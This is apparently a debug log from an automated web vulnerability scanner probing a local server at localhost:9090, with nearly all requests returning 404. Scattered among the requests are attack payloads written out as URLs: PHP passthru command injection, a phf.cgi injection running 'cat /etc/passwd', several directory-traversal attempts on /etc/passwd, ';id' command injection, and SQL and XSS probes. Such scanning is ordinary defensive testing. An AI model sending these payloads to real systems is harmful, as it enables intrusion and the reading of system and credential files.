to run [Wed Feb 12 10:04:30 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/shopexd.asp?catalogid=\'42 returned HTTP code "404" (id=23642,from_cache=0,grep=1,rtt=0.19,did=9FwCDwUJ) [Wed Feb 12 10:04:30 2020 - debug] strange_reason.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:178 / in_use:3 / max:50 / total:181) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (53e105d195a141c9, 0.06 sec) (a558d5c3a36d52b6, 0.01 sec) (155b0c18b9ccb8f2, 0.01 sec) [Wed Feb 12 10:04:30 2020 - debug] error_pages.grep(uri="http://localhost:9090/40/") took 0.10s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/Survey/Survey.Htm returned HTTP code "404" (id=23640,from_cache=0,grep=1,rtt=0.03,did=uHDO5KUn) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/forum/ returned HTTP code "404" (id=23637,from_cache=0,grep=1,rtt=0.07,did=3nbTSqYf) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/_vti_bin/_vti_aut/dvwssr.dll returned HTTP code "404" (id=23646,from_cache=0,grep=1,rtt=0.04,did=LAaDZK3I) [Wed Feb 12 10:04:30 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cache_control.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_headers.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] ssn.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] oracle.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] url_session.grep(uri="http://localhost:9090/40/") took 0.14s to run [Wed Feb 12 10:04:30 2020 - debug] feeds.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/admin/database/wwForum.mdb returned HTTP code "404" (id=23650,from_cache=0,grep=1,rtt=0.08,did=zXuijVKl) [Wed Feb 12 10:04:30 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/85/exec/show returned HTTP code "404" (id=23655,from_cache=0,grep=1,rtt=0.12,did=NJV1yse1) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12228, 'reject-seen-url': 5647, 'reject-out-of-scope': 216, 'accept': 4934} [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:30 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/40/") took 0.05s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/forum/index.php?name=forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23657,from_cache=0,grep=1,rtt=0.03,did=9HFTkZKG) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/doc-html/ returned HTTP code "404" (id=23654,from_cache=0,grep=1,rtt=0.01,did=F2tFhZBK) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/access_log returned HTTP code "404" (id=23656,from_cache=0,grep=1,rtt=0.03,did=0E1OPCl0) [Wed Feb 12 10:04:30 2020 - debug] symfony.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] file_upload.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] expect_ct.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] svn_users.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] private_ip.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] motw.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] meta_generator.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] retirejs.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2219. [Wed Feb 12 10:04:30 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:30 2020 - debug] serialized_object.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] blank_body.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] credit_cards.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] websockets_links.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/76/exec/show returned HTTP code "404" (id=23659,from_cache=0,grep=1,rtt=0.03,did=YZPL2O6h) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/css/ returned HTTP code "404" (id=23660,from_cache=0,grep=1,rtt=0.04,did=aDGOU2SI) [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:181 / in_use:2 / max:50 / total:183) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (7d7a9b0975535150, 0.04 sec) (155b0c18b9ccb8f2, 0.03 sec) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/iissamples/exair/search/query.asp returned HTTP code "404" (id=23665,from_cache=0,grep=1,rtt=0.14,did=PmdKIeBS) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/16/exec/-/pwd returned HTTP code "404" (id=23668,from_cache=0,grep=1,rtt=0.10,did=Eo3SUihp) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/entropybanner.cgi returned HTTP code "404" (id=23671,from_cache=0,grep=1,rtt=0.08,did=fyGuYZtn) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=;id returned HTTP code "404" (id=23663,from_cache=0,grep=1,rtt=0.04,did=RQFGxAqz) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc returned HTTP code "404" (id=23664,from_cache=0,grep=1,rtt=0.12,did=pe0zVz11) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/bugs/forgot_password.php?email=\\"> returned HTTP code "404" (id=23675,from_cache=0,grep=1,rtt=0.24,did=v8D08I7U) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/compressed/ returned HTTP code "404" (id=23662,from_cache=0,grep=1,rtt=0.16,did=lNvWhkuj) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23667,from_cache=0,grep=1,rtt=0.24,did=QJW0mOOp) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23669,from_cache=0,grep=1,rtt=0.11,did=F8MdvhKd) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/ccard/ returned HTTP code "404" (id=23666,from_cache=0,grep=1,rtt=0.25,did=ibwWSKDc) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/Agents/ returned HTTP code "404" (id=23674,from_cache=0,grep=1,rtt=0.18,did=f0df2P1d) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/musicqueue.cgi returned HTTP code "404" (id=23658,from_cache=0,grep=1,rtt=0.05,did=RtRG2I2w) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/level/95/exec/show returned HTTP code "404" (id=23672,from_cache=0,grep=1,rtt=0.10,did=0J9kTKdn) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/boot/ returned HTTP code "404" (id=23661,from_cache=0,grep=1,rtt=0.18,did=1H9oWbIO) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/import/ returned HTTP code "404" (id=23670,from_cache=0,grep=1,rtt=0.10,did=dVxjycrS) [Wed Feb 12 10:04:31 2020 - debug] csp.grep(uri="http://localhost:9090/37/") took 0.11s to run [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23676,from_cache=0,grep=1,rtt=0.13,did=MnqtTCwy) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/bak/ returned HTTP code "404" (id=23680,from_cache=0,grep=1,rtt=0.03,did=gkcN81uw) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/excel/ returned HTTP code "404" (id=23683,from_cache=0,grep=1,rtt=0.09,did=Oy4mSCWk) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd= returned HTTP code "404" (id=23685,from_cache=0,grep=1,rtt=0.11,did=19kcXs6L) [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12244, 'reject-seen-url': 5655, 'reject-out-of-scope': 216, 'accept': 4935} [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/htpasswd returned HTTP code "404" (id=23686,from_cache=0,grep=1,rtt=0.07,did=q1dUqUgD) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2220. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/include/new-visitor.inc.php returned HTTP code "404" (id=23681,from_cache=0,grep=1,rtt=0.07,did=00MZ7hRQ) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/guests/ returned HTTP code "404" (id=23684,from_cache=0,grep=1,rtt=0.12,did=VTedQHvt) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/doc returned HTTP code "404" (id=23687,from_cache=0,grep=1,rtt=0.03,did=Gwo9XJxJ) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/admin/ returned HTTP code "404" (id=23689,from_cache=0,grep=1,rtt=0.14,did=C2d33s4f) [Wed Feb 12 10:04:31 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] keys.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/pp.php?action=login returned HTTP code "404" (id=23682,from_cache=0,grep=1,rtt=0.33,did=PN5LWjAU) [Wed Feb 12 10:04:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] clamav.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/modules/index.php?name=Forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23688,from_cache=0,grep=1,rtt=0.23,did=5s641tpQ) [Wed Feb 12 10:04:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/37/") took 0.08s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/db/ returned HTTP code "404" (id=23677,from_cache=0,grep=1,rtt=0.02,did=d2UVUlTa) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cfdocs/examples/httpclient/mainframeset.cfm returned HTTP code "404" (id=23678,from_cache=0,grep=1,rtt=0.13,did=tpLBP4gG) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/signup.cgi returned HTTP code "404" (id=23673,from_cache=0,grep=1,rtt=0.19,did=uAOumNah) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23690,from_cache=0,grep=1,rtt=0.06,did=S1mpovjt) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/internal/ returned HTTP code "404" (id=23691,from_cache=0,grep=1,rtt=0.15,did=2Bd4QS5P) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2221. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/gbadmin.cgi?action=setup returned HTTP code "404" (id=23679,from_cache=0,grep=1,rtt=0.11,did=aHNyLzll) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/acart2_0/signin.asp?msg= returned HTTP code "404" (id=23692,from_cache=0,grep=1,rtt=0.08,did=1K701WZy) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23693,from_cache=0,grep=1,rtt=0.06,did=YYC3v78c) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/archives/ returned HTTP code "404" (id=23695,from_cache=0,grep=1,rtt=0.03,did=OmViPa5R) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/forums/ returned HTTP code "404" (id=23694,from_cache=0,grep=1,rtt=0.03,did=gl3taZFM) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2222. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/admin/admin.shtml returned HTTP code "404" (id=23696,from_cache=0,grep=1,rtt=0.07,did=4kmSkmUP) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/lib/ returned HTTP code "404" (id=23697,from_cache=0,grep=1,rtt=0.03,did=BWX7ARkx) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/users.lst returned HTTP code "404" (id=23701,from_cache=0,grep=1,rtt=0.13,did=UR535UIa) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/cgi-bin/phf.cgi?QALIAS=x\n/bin/cat /etc/passwd returned HTTP code "404" (id=23698,from_cache=0,grep=1,rtt=0.11,did=QJhOnjCs) [Wed Feb 12 10:04:31 2020 - debug] url_session.grep(uri="http://localhost:9090/37/") took 0.09s to run [Wed Feb 12 10:04:31 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] objects.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] error_500.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_tags.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] password_profiling.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] click_jacking.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2223. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/shopping/diag_dbtest.asp returned HTTP code "404" (id=23699,from_cache=0,grep=1,rtt=0.04,did=FsTdSIOr) [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:181 / in_use:5 / max:50 / total:186) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (ec3d637392e043c6, 0.16 sec) (7d7a9b0975535150, 0.11 sec) (fa99a017016708ef, 0.04 sec) (a7e516d87c3a71de, 0.04 sec) (45aab23e640b1462, 0.00 sec) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2224. [Wed Feb 12 10:04:31 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2225. [Wed Feb 12 10:04:31 2020 - debug] error_pages.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_reason.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cache_control.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_headers.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] ssn.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] oracle.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] feeds.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4531. [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23702,from_cache=0,grep=1,rtt=0.02,did=KITPnpxV) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/acciones/ returned HTTP code "404" (id=23703,from_cache=0,grep=1,rtt=0.07,did=cLI9Hsqy) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/level/86/exec/show returned HTTP code "404" (id=23704,from_cache=0,grep=1,rtt=0.16,did=t0DL4uXM) [Wed Feb 12 10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12258, 'reject-seen-url': 5664, 'reject-out-of-scope': 216, 'accept': 4937} [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/cgi-bin/entropysearch.cgi?query=asdfasdf&user=root&basehref=//www.yourdomain.com/ returned HTTP code "404" (id=23705,from_cache=0,grep=1,rtt=0.03,did=ViXdwOMb) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/viewtopic.php?t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23706,from_cache=0,grep=1,rtt=0.12,did=QOwNk7h1) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/down/ returned HTTP code "404" (id=23707,from_cache=0,grep=1,rtt=0.09,did=LK2JCZEQ) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/WEBAGENT/CQMGSERV/CF-SINFO.TPF returned HTTP code "404" (id=23708,from_cache=0,grep=1,rtt=0.17,did=cTEZfQfK) [Wed Feb 12 10:04:31 2020 - debug] lang.grep(uri="http://localhost:9090/37/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/37/") took 0.12s to run [Wed Feb 12 10:04:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/analog/ returned HTTP code "404" (id=23709,from_cache=0,grep=1,rtt=0.12,did=THxvQ7px) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2226. [Wed Feb 12 10:04:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2227. [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere] returned HTTP code "404" (id=23710,from_cache=0,grep=1,rtt=0.21,did=x2GVk4lD) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/Excel/ returned HTTP code "404" (id=23712,from_cache=0,grep=1,rtt=0.17,did=eswPT12x) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/buy/ returned HTTP code "404" (id=23713,from_cache=0,grep=1,rtt=0.02,did=MkAP1eOS) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/level/96/exec/show returned HTTP code "404" (id=23715,from_cache=0,grep=1,rtt=0.13,did=nAJoqq15) [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:181 / in_use:7 / max:50 / total:188) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (288ccd1fb05c7874, 0.26 sec) (168bab938c53b403, 0.13 sec) (aa5b8298906d160f, 0.11 sec) (cd749e63936b7e81, 0.09 sec) (0f739b2a46cded28, 0.04 sec) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/logfile.txt returned HTTP code "404" (id=23711,from_cache=0,grep=1,rtt=0.10,did=TE3mK5gx) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/conecta/ returned HTTP code "404" (id=23716,from_cache=0,grep=1,rtt=0.07,did=KL0BljGI) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/logs/error_log returned HTTP code "404" (id=23714,from_cache=0,grep=1,rtt=0.03,did=wEVLVyBW) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2228. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2229. [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2230. [Wed Feb 12 10:04:31 2020 - debug] The framework has 131 active threads. [Wed Feb 12 10:04:31 2020 - debug] symfony.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] motw.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_generator.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] retirejs.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] websockets_links.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] csp.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] keys.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] clamav.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] svn_users.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/impreso/ returned HTTP code "404" (id=23717,from_cache=0,grep=1,rtt=0.10,did=zRDKo8Uj) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/scripts/tools/newdsn.exe returned HTTP code "404" (id=23718,from_cache=0,grep=1,rtt=0.04,did=4L6VNoFq) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/Administration/ returned HTTP code "404" (id=23722,from_cache=0,grep=1,rtt=0.07,did=OV2FbViY) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/webalizer/ returned HTTP code "404" (id=23723,from_cache=0,grep=1,rtt=0.33,did=ypMz9PGa) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23721,from_cache=0,grep=1,rtt=0.12,did=Sw7XHYOU) [Wed Feb 12 10:04:31 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] objects.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] error_500.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] meta_tags.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] password_profiling.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] click_jacking.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] lang.grep(uri="http://localhost:9090/tech/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/eventum/index.php?err=3&email=\\"> returned HTTP code "404" (id=23724,from_cache=0,grep=1,rtt=0.10,did=tUF4obmz) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/ministats/admin.cgi returned HTTP code "404" (id=23720,from_cache=0,grep=1,rtt=0.15,did=4D1zdpIz) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/dbase/ returned HTTP code "404" (id=23719,from_cache=0,grep=1,rtt=0.02,did=kXbOnsgD) 